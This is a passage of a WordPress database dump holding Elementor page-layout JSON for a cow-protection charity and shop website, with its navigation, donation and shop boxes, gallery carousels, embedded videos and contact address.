us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_stop\":{\"unit\":\"%\",\"size\":86,\"sizes\":[]},\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11736,1945,'_elementor_page_assets','a:0:{}'),(11738,1946,'_elementor_edit_mode','builder'),(11739,1946,'_elementor_template_type','wp-page'),(11740,1946,'_elementor_version','3.7.8'),(11741,1946,'_wp_page_template','elementor_canvas'),(11742,1946,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s 